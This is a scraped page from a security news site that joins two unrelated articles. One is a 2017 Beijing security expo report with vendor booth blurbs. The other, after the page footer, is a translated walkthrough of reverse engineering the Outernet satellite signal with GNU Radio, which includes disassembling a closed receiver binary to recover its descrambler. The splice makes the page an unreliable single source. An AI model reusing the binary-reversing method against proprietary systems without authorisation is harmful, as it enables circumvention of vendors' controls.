知道创宇是国内最早提出云监测与云防御理念的网络安全公司,经过多年的积累,利用在云计算及大数据处理方面的行业领先能力,可为客户提供具备国际一流安全技术标准的可视化解决方案,提升客户网络安全监测、预警及防御能力。

http://p6.qhimg.com/t01f591729a2ef96620.jpg

启明星辰展区

启明星辰拥有完善的专业安全产品线,横跨防火墙/UTM、入侵检测管理、网络审计、终端管理、加密认证等技术领域,共有百余个产品型号,并根据客户需求不断增加。启明星辰解决方案为客户的安全需求与信息安全产品、服务之间架起桥梁,将客户的安全保障体系与信息安全核心技术紧密相连,帮助其建立完善的安全保障体系。目前,公司在全国各省市自治区设立三十多家分支机构,拥有覆盖全国的渠道和售后服务体系 。

http://p3.qhimg.com/t0101105dd42c5b02ff.jpg

山石网科展区

山石网科专注于网络安全领域的前沿技术创新,为企业级和运营商用户提供智能化、高性能、高可靠、简单易用的网络安全解决方案。Hillstone以网络安全的需求变化为创新基点,立志为全球用户打造安全的网络环境,成为世界第一流的安全厂商。

http://p1.qhimg.com/t015ebac2924436a6c3.jpg

金山安全展区

金山安全在个人安全和企业安全领域有着数十年的产品与服务经验,尤其企业级安全产品在业内更是拥有大量的用户服务经验和良好口碑。此次参展的“云+关+端+边界”企业安全一体化方案,便是以大中型企业级用户为主要服务对象。经过多年的信息化建设,政府、企业的重要业务系统现已形成并堆积了多类别、跨平台的数据,不同业务系统的安全边界已经模糊。如果缺少整合的一体化的解决方案并以完善的信息化安全策略去监控、治理,必将埋下数据泄露等严重后果。

http://p9.qhimg.com/t012a84d2236df03c89.jpg

永信至诚企业安全大学展区

永信至诚企业安全人才能力提升解决方案涵盖130门、1500节、共计10500分钟的各类网络安全实用课程,并拥有200余个课程配套实验,根据企业安全人才的不同角色,推出了安全开发、安全运维、安全规划和安全管理四大职业课程体系,并针对电信、电力、能源、金融、制造、政府、教育、互联网8大行业推出了满足行业业务安全需求的专项人才培养体系,充分满足了各类企业对于网络安全实践型人才培养的不同维度需求。

http://p8.qhimg.com/t011a1fc1f2c4c2169e.jpg

北京四维创智展区

四维创智是网络信息安全服务领域中崛起的新星,专注于企业网络安全的检测和防护,致力于提高企业网络信息安全防护能力。 为政府、电力、金融等行业大客户提供可靠的网络安全解决方案和安全服务。同时为运营商、互联网公司和其他安全公司提供产品和服务共同打造安全可靠的互联网环境。

http://p3.qhimg.com/t01ab4f74f4fd1ec288.jpg

北京安华金和展区

安华金和专注于数据库安全领域,由长期致力于数据库内核研发和信息安全领域的专业资深人员共同创造,是国内领先的,提供全面的数据库安全产品、服务和解决方案服务商,覆盖数据库安全防护的事前检查、事中控制和事后审核,帮助用户全面实现数据库安全防护和安全合规。

安华金和数据库安全产品,已经广泛地应用于政府、社保、军队、军工、运营商、金融、医疗、企业信息防护等领域,建立了一定的声誉,成为众多渠道合作伙伴及终端用户在该数据库安全防护领域寻求产品和服务的首选。

http://p5.qhimg.com/t015e917e0d99d9ecc7.jpg

通付盾展区

通付盾集产、学、研为一体,致力于打造金融科技安全的全产业链服务模式:自2011年以来,通付盾投资数亿元,打造“通付盾云”。通过采用网络安全行业的新兴云服务模式,为客户带来高效、便捷的产品服务体验。截至目前,已累计服务数千家企业客户。

通付盾重视学科合作和技术研究、储备。通付盾与中国科技大学在安全领域的基础技术和前沿技术方面长期开展深度合作,并且成立了由区块链、反欺诈和移动安全三大实验室组成的研究院,以推动前沿新技术的产品化;

http://p1.qhimg.com/t01e0bd302ed0dbb423.jpg

绿盟科技展区

绿盟科技为政府、运营商、金融、能源、互联网以及教育、医疗等行业用户,提供具有核心竞争力的安全产品及解决方案,帮助客户实现业务的安全顺畅运行。

基于多年的安全攻防研究,绿盟科技在检测防御类、安全评估类、安全平台类、远程安全运维服务、安全SaaS服务等领域,为客户提供入侵检测/防护、抗拒绝服务攻击、远程安全评估以及Web安全防护等产品以及安全运营等专业安全服务。

http://p8.qhimg.com/t01b84a6219022e7aae.jpg

蓝盾科技展区

十年以来蓝盾科技致力于网络安全产品的研发,已自主研发出蓝盾防火墙、多功能安全网关(UTM)、账号集中管理、安全审计、入侵检测、漏洞扫描等十个系列,近50个型号的产品,各项产品通过国家公安、安全、保密、军队等权威主管部门检测认证;并以安全产品为基础,建立信息安全保障体系为目标,以等级保护为主线,并提供等级保护咨询、风险评估、安全体系设计、安全规划、策略制定、安全建设与集成、安全运维外包服务、安全托管监控服务、安全培训等全方位的专业安全服务。是以安全产品、安全服务、安全集成的综合性网络安全公司。

http://p0.qhimg.com/t01134ba19bf95b2e19.jpg

PCSA展区

PCSA致力于云安全关键技术及标准的研究、应用和推广,为各行业(私有)云建设提供安全咨询和解决方案

http://p7.qhimg.com/t011b57cfa0c12cc882.jpg

码牛科技展区

专注于公共安全的互联网审计和大数据分析领域,为WLAN和公共上网场所提供审计服务,逐步积累形成大数据分析中心,并基于此开展内容运营服务。

码牛科技致力于高端信息安全产品的设计、研发、集成和运营,由一群年轻的IT资深专家创立,具有丰富的行业经验和客户积累,拥有多项自主研发的大数据软件产品和网络安全及互联网营销产品自主知识产权,在特定行业内的应用深得用户好评。

http://p3.qhimg.com/t014e95c83c0ce4e221.jpg

梆梆安全展区

梆梆安全运用前沿技术提供专业可靠的服务,为全球政府、企业、开发者和消费者打造安全、稳固、可信的移动应用生态环境。已为7万家注册企业及开发者,超过70万个移动应用提供移动应用安全服务。这些应用已累计安装在7亿移动终端上。梆梆安全企业级用户遍及金融、物联网、物联网、政府、军工、企业、能源、运营商、交通等各大行业,覆盖亚洲、欧洲及北美等主要市场。

http://p1.qhimg.com/t012b120e863b4eca0e.jpg

Neusoft东软展区

东软是中国最大的IT解决方案与服务供应商。东软以软件技术为核心,通过软件与服务的结合,软件与制造的结合,技术与行业管理能力的结合,提供行业解决方案和产品工程解决方案以及相关软件产品、平台及服务。

http://p3.qhimg.com/t010df0d2fd31d6b8b1.jpg

瑞星展区

在此次活动上,瑞星主打下一代企业安全解决方案,包括终端安全、边界安全和云安全三个部分,形成了“内外结合,防御感知”的安全体系。瑞星终端安全解决方案包括:瑞星杀毒软件网络版、瑞星ESM(瑞星下一代网络版杀毒软件),SaaS安全云终端;云安全解决方案包括:瑞星全系列虚拟化平台安全软件及Linux安全软件;网关安全解决方案包括:瑞星防毒墙、瑞星下一代防火墙、瑞星态势感知系统及上网行为管理系统等硬件产品。

http://p2.qhimg.com/t01a65d4fe369e2cc9e.png

卫达展区

北京卫达科技有限公司(VEDA)全球首创“智能动态防御”(AI Dynamic Defence)技术,颠覆传统网络安全理念、打破原有网络安全防御被动格局、引领新型网络安全防御技术发展方向。

http://p0.qhimg.com/t013d69c2d98909a4fa.jpg

立思辰展区

立思辰信息安全科技集团,顺应国家信息安全及国产替代的大趋势,致力于成为业界顶级的数据安全管控专家。围绕集团的战略发展方向,建立了完善的技术创新体系,并被国家授予了北京市企业研发中心、北京市工程实验室,并与浙江清华长三角研究院合作成立了立思辰企业研究中心。以数据全生命周期安全管控为基础,为行业用户提供安全解决方案,打造自主可控、安全可信、高效可用的信息系统,客户遍及政府、国防军工、教育、金融、能源、交通、通信等几大行业。

http://p1.qhimg.com/t01f379557ce727fefd.jpg

上海兆芯集成电路展区

上海兆芯集成电路有限公司是国内领先的芯片设计厂商,兆芯是国内仅有的掌握中央处理器(CPU)、图形处理器(GPU)、芯片组(Chipset)三大核心技术的公司,拥有三大核心芯片的完全自主设计研发能力,全部研发环节透明可控,产品性能国内领先。其中,兆芯自主研发并量产的中央处理器(CPU)基于国际主流的x86架构,是目前国内唯一一个可以完全替代国外同类型产品的国产自主CPU供应商。

http://p7.qhimg.com/t01aecb386910aca993.jpg

匡恩网络展区

匡恩网络专注于物联网安全的高科技创新企业,在关键基础设施网络安全、工业控制网络安全、安全大数据分析这三个核心领域都有独到技术,业务范围涉及工业物联网安全、智慧城市、平安城市、车联网、智能制造等诸多领域。

http://p8.qhimg.com/t0125faadc3b38681bb.jpg

随着网络经济的发展和智能社会的快速推进,有工业物联网形成的安全问题日益突显、迅速放大,甚至将成为改变整个世界安全形势和格局的重要因素。目前,我国工业物联网安全面临着有安全缺运营、有数据缺分析、威胁感知难响应慢等难题,近年来我国电力、石化、烟草等行业都遭受了针对工业物联网的网络攻击,造成系统崩溃、数据采集失败、通信中断甚至停工、停产等严重后果。

为了响应“中国制造2025”及“两化融合”的行动纲领,解决工业物联网安全领域面临的严峻挑战,匡恩网络正式推出“工业物联网安全态势中心”一站式私有云平台安全解决方案,基于物联网、云计算、大数据等技术,对安全威胁进行综合处理,实现威胁预警、态势感知、攻击溯源和精确应对,为我国工业物联网产业的健康稳定发展保驾护航。

http://p8.qhimg.com/t01bcc6c327a3caf9e5.jpg

匡恩车联网威胁探知及主动防御平台

其中,针对智能网联汽车及车联网的安全风险,“车联网安全检测平台”采用全扩展式架构进行全方位、全智能、全可见式的安全检测,从接入安全、通讯安全、总线安全、车载系统安全四方面安全性(4S)进行全方位检测,并根据检测结果提供安全风险建议,提升汽车信息安全能力,加强汽车行业的安全技术积累,为汽车产业的安全发展保驾护航。

物联网产业规模庞大,提高物联网系统整体的安全性尤为重要。 “可信审计平台”将全面提升物联网系统的抗攻击抗病毒能力。该平台基于国内自主研发的TCM芯片硬件为可信根,通过可信链构建可信计算安全度量环境,确保系统启动链中各关键节点,如Bootloader、Linux内核、设备引擎、WEB服务等关键信息不被篡改或攻击,从而确保系统的启动过程安全可信。

http://p2.qhimg.com/t0112b9dc18d23ade46.jpg

工控安全

威努特和卫达是本次展会中专注于工控安全的两家公司

威努特展区

http://p8.qhimg.com/t015ae804097810a05d.jpg

威努特工控网络攻防演练平台是在工业现场仿真系统的基础上,进行攻击渗透和安全防护演示,集教学、科研、评测、展示等功能于一体的综合性工控安全实验平台。通过模拟攻击行为和防护措施,展现攻击效果、验证防护措施的有效性,帮助工业企业提高综合防护能力。支撑国家“以攻促防”、“以攻代防”的网络安全战略。

http://p5.qhimg.com/t01f76bf810b7d2b8e2.jpg

关键信息基础设施等级保护研讨会

http://p4.qhimg.com/t01f4be119b854d42ce.jpg

第二届“关键信息基础设施等级保护研讨会”在北京展览馆成功举行,本次研讨会由公安部主办,中央网信办、国家保密局、国家密码管理局支持,北京市公安局承办,360企业安全集团协办。公安部、国家保密局、国家密码管理局等部门领导,网络安全等级保护专家委员会委员,国家网络与信息安全信息通报机制成员单位相关领导、技术支持单位的专家共计近500人参加了此次研讨论。

http://p6.qhimg.com/t01afb564f687a7b9c5.jpg

本次研讨会是为贯彻中央领导关于网络安全的重要指示精神,深化学习贯彻《网络安全法》,增强重要行业部门和社会各界维护关键信息基础设施安全的意识,切实加强国家关键信息基础设施安全保护工作而举办的。

http://p8.qhimg.com/t019947a8644b6ea93c.jpg

研讨会上,中国工程院沈昌祥院士、公安部网络安全保卫局郭启全总工程师、国土资源部信息中心顾炳中总工程师、国家烟草专卖局张雪峰副巡视员和国家电网信通部王继业主任以及360公司高级副总裁兼首席安全官谭晓生、上海交通大学信息安全服务技术研究实验室副主任银鹰博士等专家,分别作了“关键信息基础设施等级保护核心技术”、“网络安全等级保护制度与关键信息基础设施保护”、“如何理解网络安全等级保护制度进入2.0时代”、“烟草行业深化开展关键信息基础设施等级保护工作经验介绍”及“以态势感知为中心构建关键信息基础设施立体防御体系”等专题报告,交流研讨了发达国家在关键信息基础设施保护方面的法律法规、政策标准、主要举措以及对我国的启示借鉴;交流了深化以保护关键信息基础设施为重点的网络安全等级保护制度的工作经验,探讨加强国家关键信息基础设施等级保护的主要举措、新技术和新方法。

http://p7.qhimg.com/t0141eaaac8a3bf878d.jpg

治理沾毒网站 保护上网安全专题论坛

网站被挂马、暗链和恶意篡改已经成为危害网站安全的突出问题,给网民上网带来安全风险和隐患威胁。一些“染”毒网站还成为网上诈骗、淫秽色情、赌博等违法信息,以及黑客攻击和侵犯公民个人信息等网络犯罪活动的重要载体和渠道。治理“染”毒网站,需要打防结合、综合治理。当前,重要的措施是迅速行动,清理“染”毒网站,提升网站安全防护能力。

为此,在公安部网络安全保卫局的指导下,在北京“首都网络安全宣传日”活动中,公安部第三研究所、网络安全事件预警与防控技术国家工程实验室联合阿里、百度、360、安恒、知道创宇等国内知名互联网企业、网络安全企业,面向广大网站开办维护人员、互联网数据中心管理人员和网络安全从业人员,以及广大网民,举办“治理‘染’毒网站 保障上网安全”专题论坛,宣传网站安全防护、防范“染”毒网站知识,首次在国内推出公益性网站安全服务。

http://p4.qhimg.com/t01faaad75cb5af2b88.jpg

明星代言打击网络黑产

http://p3.qhimg.com/t0177eb4c4ce6b381b8.jpg

http://p8.qhimg.com/t01422f7cfaee0e1d7a.jpg

http://p8.qhimg.com/t01cfff19d64d8d82c0.jpg

演讲人:百度公司 武广柱首席架构师

议题:基于搜索引擎染毒网站识别

http://p9.qhimg.com/t0165ca7cb1e976d1ee.jpg

演讲人:360企业安全集团副总裁 欧怀谷

议题:云端联动,治理网站三大顽疾

http://p7.qhimg.com/t01113fd0766dd01002.jpg

http://p3.qhimg.com/t01887e02ee48200fda.png

展会亮点

1.着力突出大会定位—国际性、专业性、行业性、全面性、社会性。

自2015年第二届“429首都网络安全日”起,博览会经过三年的发展,在国内外政府信息安全部门、信息安全企业、科研院校、行业用户、媒体的支持下,成为国内汇聚最多知名企业、举办最多专业活动、邀请最多权威机构、吸引最多优质买家的信息安全专业展会,服务领域由网络安全、信息安全等专业领域,逐步延伸到市政交通、金融支付、智慧医疗、智慧生活等大型综合工程项目。2017年北京国际互联网科技博览会,利用积累优秀资源,邀请国内外互联网大咖和演讲嘉宾,通过展览、论坛、研讨会、竞赛、情怀活动等多种形式,全方位展示最前沿的网络安全和互联网技术和信息安全人才理念,倡导社会各界重视网络安全,提升社会各界的网络安全意识。

http://p0.qhimg.com/t0158b886c4d3083ac4.jpg

2.聚焦互联网新兴领域,引领行业创新风向标。

随着云计算、大数据、企业移动、物联网、人工智能等新技术涌现,新的应用领域及业务模式随之出现。但也带来了不少新的安全问题。对此,本着“网络安全同担、网络生活共享”的“429”活动主题,本届大会期间将同步举办多场系列高峰论坛。论坛主题从网络安全延伸至人工智能、金融安全、智慧医疗、智能生活、智慧城市建设等内容,聚焦探讨网络安全技术和应用热点话题,洞悉全球信息安全最新发展趋势,与展览展示一体两翼、双剑合璧,强力推动首都各界网络安全建设,引领网络安全行业创新,促进网络安全产业发展。全行业通力合作,共建网络安全生态。

http://p3.qhimg.com/t0166f6742d084c14c0.jpg

3.向全市人民推广普及网络安全意识,建设网络良好生态。

我国经济发展进入新常态,新常态要有新动力,互联网在这方面可以大有作为。我们实施“互联网+”行动计划,带动全社会兴起了创新创业热潮树立正确的网络安全观,实现“两个一百年”奋斗目标,需要全社会方方面面同心干,需要全国各族人民心往一处想、劲往一处使。网络安全为人民,网络安全靠人民,维护网络安全是全社会共同责任,需要政府、企业、社会组织、广大网民共同参与,共筑网络安全防线。

4.全行业通力合作,共建网络安全生态。

2017年北京国际互联网科技博览会得到了中央网信办、公安部、工信部、国家保密局、国家密码管理局以及市各委办局、各区县等各级领导的广泛支持,吸引了阿里巴巴、百度、360、公安部三所、知道创宇、金山安全、匡恩、立思辰、梆梆安全、中关村信息安全测评联盟、行业云安全能力者联盟、北京网络行业协会等行业领军企业、协议机构同台竞技。参展企业达到120多家,总体展出面积共 20000平米。同时将邀请网络安全行业、银行和金融行业、水、电、煤、气、热等能源行业、通信服务行业、政府部门、部队、医疗机构、电商、第三方支付机构、科研院所、高等院校、专家学者、行业媒体等专业观众前来观展。与此同时,大会现场为合作的40多家大众媒体、网络主流媒体、纸媒、自媒体、直播平台提供免费的媒体中心,对大会进行持续全方位的报道。另外,今年的“新品发布”环节将全新升级,为参展企业打造全新发布平台。

参考链接

http://finance.ifeng.com/a/20170426/15321881_0.shtml

活动发布、推广及现场报道请联系安全客 duping@360.cn

商务合作,文章发布请联系 dengjinling@360.cn
安全活动

聪明的狗子 官方小编 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
你全家都是黑客
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
聪明的狗子
嗷呜
文章
86
粉丝
18
TA的文章
2018首席安全官(CSO)国际高峰论坛(干货PPT下载)
2018-04-27 15:18:31
429首都网络安全日
2018-04-25 13:24:12
全球没人能监控的聊天软件也要死了 — Telegram
2018-03-26 18:04:52
带一本书回家过年|安全客季刊精华合辑
2018-02-14 18:17:33
带一本书回家过年|安全客季刊精华合辑
2018-02-14 10:27:04
输入关键字搜索内容
相关文章
新课特惠 | 一文读懂人工智能、机器学习、深度学习、强化学习的关系
好课推荐,转发有礼 |《一篇文章了解云安全领域的新宠CCSK》
精彩回顾 | 2019数字中国网络安全生态峰会
58赶集集团第一届安全技术沙龙
SRC白帽子技术沙龙 | 安全+ WiFi万能钥匙SRC 苏宁SRC
陌陌惊喜 | 双倍积分活动来袭,单个漏洞基础奖励可达两万元
漏洞暴击!︱双11花掉的钱BUGX给你补回来
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

outernet

outernet
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【技术分享】针对Outernet卫星信号的逆向工程
阅读量 56413 | 稿费 200

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2016-11-14 09:59:37
译文声明
本文是翻译文章,文章原作者,文章来源:gnuradio
原文地址:http://gnuradio.org/blog/reverse-engineering-outernet/

译文仅供参考,具体内容表达以及含义原文为准

×

翻译:twittered

稿费:200RMB(不服你也来投稿啊!)

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

前言

Outernet[1]是一家旨在让访问国际互联网更加方便自由的公司,他们使用卫星来广播维基百科或者其他网站。目前,他们的广播主要使用三颗国际海事卫星[3]的L波段[2],使其广播覆盖全球,大多数接收机是开源的,可是,他们的关键部分是闭源的,比如二进制的数据分发模式和信号的详细信息。实际上,Outernet可能违反了GPL ,因为他们的sdr100[4]是基于librtl SDR和libmirisdr[5]开发的,而这两个使用了GPL开源协议。

详情

最近。我逆向了 Outernet 的信号,并完成了一个完全开源的的解码器,他由一个GNU Radio流图 gr-outernet[6]和python脚本free-outernet[7]组成,前者负责获取信号,后者负责提取出传输的文件。

在这篇文章中,我将描述GNU Radio是如何工作的还会介绍一些我用来逆向信号的工具和技术。这些技术可以同样应用于其他的类型的信号,特别是用于卫星通讯的信号(逆向结束之后,我才知道它使用了现成的卫星广播通讯方式,Datum Systems M7[8]),你可以在我的博客[9]中找到更多有关于Outernet的信息和其他项目。

处理射频信号的第一步始终都是调整设备的频率和带宽。即使你不知道怎么解调信号,他在瀑布图上,频率和带宽是很明显的。在这里,我使用Scott Chapman(K4KDR)[10]从 I-4 F3卫星上获取的I/Q数据信号,它在美国上空的广播频率是1539.8725 MHz,我们可以清楚的看见带宽大概是4.8kHz。如果你运行下面的流图,将会看到输出。

http://p6.qhimg.com/t017199aa82001acf0d.png

http://p0.qhimg.com/t01f448f2218d976b7b.png

我们如果只看这些,基本对信号一无所知,他看起来像一个4.8khz的宽峰噪音,正如 Phil Karn (KA9Q)[11]所说:“任何一个先进的通讯方案都无法区别噪音。”因为它是一个窄带卫星信号,我们猜测它使用的是PSK方式调制的,但是采用的BPSK还是QPSK?这两种都是有可能的。有一种简单的方式可以猜测PSK的类型而不用把它恢复到星图。这个方法是:首先,我们把信号功率提升到2倍(源信号乘以本身),如果我们发现了直流成分,那么这个是BPSK信号,如果没有,我们提升到4倍,如果这时产生直流成分,那么是QPSK信号。这也适用于高阶PSK信号(不适用于QAM),对于一个M-PSK信号来说,提升一个整数倍m时,会产生直流成分。

你可以看下面的流程,当提升2倍时,出现来直流脉冲,这表明,Outernet是BPSK信号。

http://p2.qhimg.com/t0105bebc9214fdf1e6.png

http://p0.qhimg.com/t011393f3c8d483ee73.png

下面的任务是获取信号的波特率,有一种叫循环平稳分析的方法可以用来获取信号的波特率。使用延时之后的信号复共轭相乘。最好的解释方式就是看下面的流图。

http://p5.qhimg.com/t01322c7fc4a2044360.png

循环平稳分析的输出显示来一个特定频率下的波特率频率分量,在下面的图中,我们可以看到在4200hz处有分量,这表明,波特率是4.2kbaud。频率图中的高平均是很重要的,否则4200hz的频率分量是很难看到的。

http://p0.qhimg.com/t01359e615ab5793a34.png

现在,我们知道了波特率,我们可以把它恢复成星图,发现它确实是BPSk信号,有关于PSK的解调[12],GNU Radio入门介绍网页[13]有一篇很好的说明。下面,你可以看到我们的BPSK解调器流图和星图,正如预期,这是一个BPSK信号。

http://p5.qhimg.com/t01f9628e05b515edde.png

http://p5.qhimg.com/t01610e972ac80fc198.png

Outernet对外所说比特率约为2 kbps,或为20MB每天,而我们分析得到的比特率是4.2kbaud,所以,很有可能它使用了r=1/2正向纠错编码,参数r被称为速率, R = 1 / 2意味着数据流使用了1/2bits用来在接收器中纠正错误位,实际速率只有我们测得速率的一半,也就是2.1kbps。

对于参数是r=1/2的数据,最流行的是使用国际空间数据系统咨询委员会提出的,r=1/2,卷积码K = 7的协议式。针对这种编码的Viterbi解码器在GNU radio中有相应的模块,叫做“Decode CCSDS 27”。然而,这种编码允许在几个变量上有所更改。我们可以使用Balint Seeber[14]的Auto FEC[15]监视Viterbi译码器的误码率并尝试不同的组合参数,直到发现一个可以正常使用的组合。 Auto FEC也可以删余一些数据(超过1/2的部分)。实际上,你很可能不知道它使用了何种删余率,因为变化太多了。

如果想使用Auto FEC,你需要在GNU Radio上打一个补丁,因为 Viterbi 解码器和 “Decode CCSDS 27”模块需要修改以便输出误码率。在这里[16],你可以找到一个用于GNU Radio当前版本的补丁(3.7.10.1测试版),同样,Auto FEC需要输入的是QPSK信号,这有一个补丁[17]可以让他与BPSK 信号工作。

从下面的流图,你可以看到Auto FEC的运行和他的输出,Auto FEC在控制台上打印各种组合,以尝试得到正确的参数。在这个输出中,需要注意的是把 “Viterbi swap”设置为true。他的含义是在CCSDS编码这个特定的环境中,多项式的数值是交换的。通常,A决定第一位,B 决定第二位。而在这里,第一位来自B,而第二位来自A。为了抵消这一点,我们需要交换每对数据,再把他们送入CCSDS协议解码器。

http://p2.qhimg.com/t013b34145b25fac890.png

现在,我们实现了一个 Viterbi 译码器并检查了它的工作。“Swap”模块是一个自定义的模块,它交换每一对浮点数。对于BPSK信号,我们要把两个Viterbi译码器放在输入流上,

其中一个比另一个延后一个样本,因为我们不知道刚开始捕获数据的时候,是一对数据的第一个还是第二个。

http://p2.qhimg.com/t013f03a40f61250478.png

你可能会看到如下的输出,其中metric变量表示Viterbi解码器的误码率,当误码率很低的时候metric变量很高,而且几乎有一个恒定的数值,相反,如果解码器没有工作,metric值会很低,并具有类似随机的值。当然,两个译码器只有一个正常工作。当BPSK解调错过一个值或者插入来一个值,(样本流多了或者少了一个bit),这两个Viterbi解码器的工作状态(是否工作正常)就会交换,如果信号质量好,不应该发生这种情况,在这个过程中,是由于树木在风中的移动干扰来信号。另外一个有趣的尝试是关闭“Swap”模块,这样的话两个Viterbi解码器都不会正常工作了。

http://p5.qhimg.com/t0153a8f90f97384b8b.png

现在,我们对Viterbi译码器是否工作很有信心,我们接下来把数据流放入raster图,观察是否使用了扰频器,如果使用了,数据流会看起来随机化,如果没有,我们会看到一些比特流的特有结构,实际上,我们基本已经确定它使用了扰频器,因为我们之前看到的BPSK信号很像噪声,而不是展现BPSK的特有频谱结构。

http://p8.qhimg.com/t0199887c39fa4bf2b6.png

正如你下面看到的,比特流的出现是随机的,所以我们还需要一个解扰器。

http://p2.qhimg.com/t019bf04675a0975eec.png

选择正确的解扰器是很困难的,因为我们没有办法去猜测它的算法,如果您知道它使用来那种卫星调制解调器,请尝试它支持的所有算法,如果您不知道,那就尝试所有流行的算法。这一步通常需要大量的试验和错误。然而,如果选用正确来,效果也是很明显的,你可你看到他的输出比特流结构,如果不对,输出还是随机的。

最常用的一种是G3RUH的复数乘法器(它用于9.6kbaud业余无线电组和几个业余卫星),数据可以使用GNU radio中的 “Descrambler” 模块加扰,它使用0x21作为掩码,长度为16 ,这个模块的参数选择很麻烦,详见我的博客。[18]

在这种情况中,G3RUH加扰器是无法工作的。有这样的事实,我们的二进制代码要传递给寄存器进行处理, sdr100在Outernet的软件中作为sdr接收器,那么,他只可能是基于ARM或者86-64架构上运行的Linux操作系统,而最新的软件版本只对arm进行支持,所以,Outernet上用于接收的部分应该是像树莓派3一样的arm板。

我对x86-64架构下的客户端程序中的sdr100二进制文件进行了逆向,来获取Outernet解扰算法,原来,这是 IESS-30解码器,很显然,这个算法的详细细节在卫星地球站的文档中没有公开。但是,我还是找到了一个文档[19](见28页),里面的描述有助于我的逆向。

我设计了一个模块用于 IESS-308 解码,您可以在这里[20]看到这个模块的代码。如果你熟悉乘法加扰器,你会发现这个加扰器很普通,但是,它用了一个计数器。

下面的流图可以测试我们的 IESS-308 解码器

http://p1.qhimg.com/t01e30b24753fff5cf7.png

输入流显示出了很明显的结构,所以我们有信心,这个解码器是正常的。你可以看到一些白色和青色的水平线,这符合长时间连续二进制0,1传输的特征。这张图中的每行每列的水平线的数量和分布代表着二进制的数据,如果把它们垂直摆放在一条线上,看起来可能更明显,我们会很容易发现什么数据是不改变的(例如报文头)或者改变的(例如数据段)。在这条推文中[21],你可以看到进行如上工作的一个例子。

http://p1.qhimg.com/t01aa24863ada97126b.png

下一步工作是解帧,通常,我们可以通过仔细观察比特流来识别帧标记,但是,在这里我们可以通过逆向sdr100二进制代码的方式减轻工作量。sdr100中,有一些函数的名称中含有HDLC,所以我们猜测可能是使用来HDLC帧,我们尝试从数据流中恢复HDLC帧。

GNU Radio中,提供了用于解HDLC帧的模块,但是,我准备用我自己的gr-kiss[22]模块。这个模块的好处是可以去保留CRC码校验错误的数据帧。有的时候,可能一个数据帧只有几个bit是错误的,他就被完全丢弃了。然而,保留CRC校验错误的帧对于逆向协议和分析测试是很有用的。有时候,HDLC帧会有几个bit的错误,那可能是因为干扰或者解码器参数没有优化,也有可能碰巧只有16位的CRC码出现了错误。在这种情况下,保留错误帧也是很有用的。

到现在为止,我们还没有考虑信号的极性,在接受 BPSK信号的时候,你不知到他是一个原始信号还是一个翻转信号(即0,1的互换),是否进行了180度的相位翻转是模糊的,很多时候,采用差分编码来消除这种模糊性。HDLC 可能采用的是NRZ-I,也可能没有采用差分编码,而采用其他方式消除模糊,这又是一个实验和试错的过程。

实际上,Outernet不使用任何一种差分编码,因此我们需要一个正置的数据流和一个反置的数据流,只有一个可以正常工作,但是我们实现不知道是哪一个。(当我们失去信号之后,下一次连接,它可能改变。)

下面是HDLC解帧的流图,“Invert bit”是一个自定义的模块,他的功能就是进行位翻转。也可以使用程序提供的模块实现这一功能。下面,我把两个HDLC解帧模块连接在数据流上,在其中一个前面进行位翻转。

当我们运行这个流图之后,在控制台上会看到数据帧的出现。因为我们开启了CRC检查,

所以我们确信我们的接收机可以正常工作。毕竟,如果我们在处理的时候有错误,是不可能出现这么多通过CRC校验的数据帧。

http://p0.qhimg.com/t01c85f62e8604c4afe.png

我们GNU Radio阶段的任务就完成了,一旦提取了HDLC数据帧,就需要使用free-outernet[23]这个Python脚本进行UDP发送,或者把它们存在一个文件里。free-outernet会回复被传输的文件,它还会打印一些有趣的调试和技术信息。

下面你可以看到脚本可以恢复的两个文件,e89f-messages-0.html.tbz2包含了用于业余无线电的APRS[25]信息,和ed57-amazon.com.html.tbz2,其中包含亚马逊的维基百科网页[26]。大部分的文件是以tbz2压缩格式发送的。另一个有趣的事情是,每分钟,会有一个时间数据包。这用来更新接收器的时钟信号,因为使用的是小型ARM,所以没有真实的时钟或者网络连接。

http://p6.qhimg.com/t01bd339247ba426614.png

提取文件后,我们可以在Web浏览器中打开亚马逊的维基百科页面。这页是一个HTML文件,其中包含CSS样式表和图片。它为独立的查看而进行了小尺寸优化,所以所有的超链接已被删除。

http://p9.qhimg.com/t019518ae5fdfeeb85f.png

对广播文件协议的介绍超出了本文的范围,你可以在我的博客[27]中找到完整的描述。我唯一不能逆向的是使用了应用级FEC的LDPC编码。它可以使接受程序在一些数据帧错误的情况下恢复文件,由于LDPC码的译码没有实现,所以你需要获取一个文件所有的数据帧才能使用我们的脚本恢复,你可以看到github上有关于LDPC的进展[28]。

参考链接

[1]https://outernet.is/

[2]https://en.wikipedia.org/wiki/L_band

[3]https://en.wikipedia.org/wiki/Inmarsat

[4]https://github.com/Outernet-Project/outernet-linux-lband/blob/master/bin/sdr100-1.0.4

[5]http://sdr.osmocom.org/trac/wiki/rtl-sdr

[5]http://cgit.osmocom.org/libmirisdr/

[6]https://github.com/daniestevez/gr-outernet

[7]https://github.com/daniestevez/free-outernet

[8]http://datumsystems.com/m7

[9]http://destevez.net/tag/outernet/

[10]https://twitter.com/scott23192

[11]http://www.ka9q.net/oldquotes.html

[12]http://gnuradio.org/redmine/projects/gnuradio/wiki/Guided_Tutorial_PSK_Demodulation

[13]http://gnuradio.org/redmine/projects/gnuradio/wiki/Guided_Tutorials

[14]http://spench.net/

[15]http://wiki.spench.net/wiki/Gr-baz#auto_fec

[16]https://gist.github.com/daniestevez/79f6f9971e1c6f883cb67a2989ba33e6

[17]https://gist.github.com/daniestevez/70d570292493daac33efb1767fc478ed

[18]http://destevez.net/2016/05/scramblers-and-their-implementation-in-gnuradio/

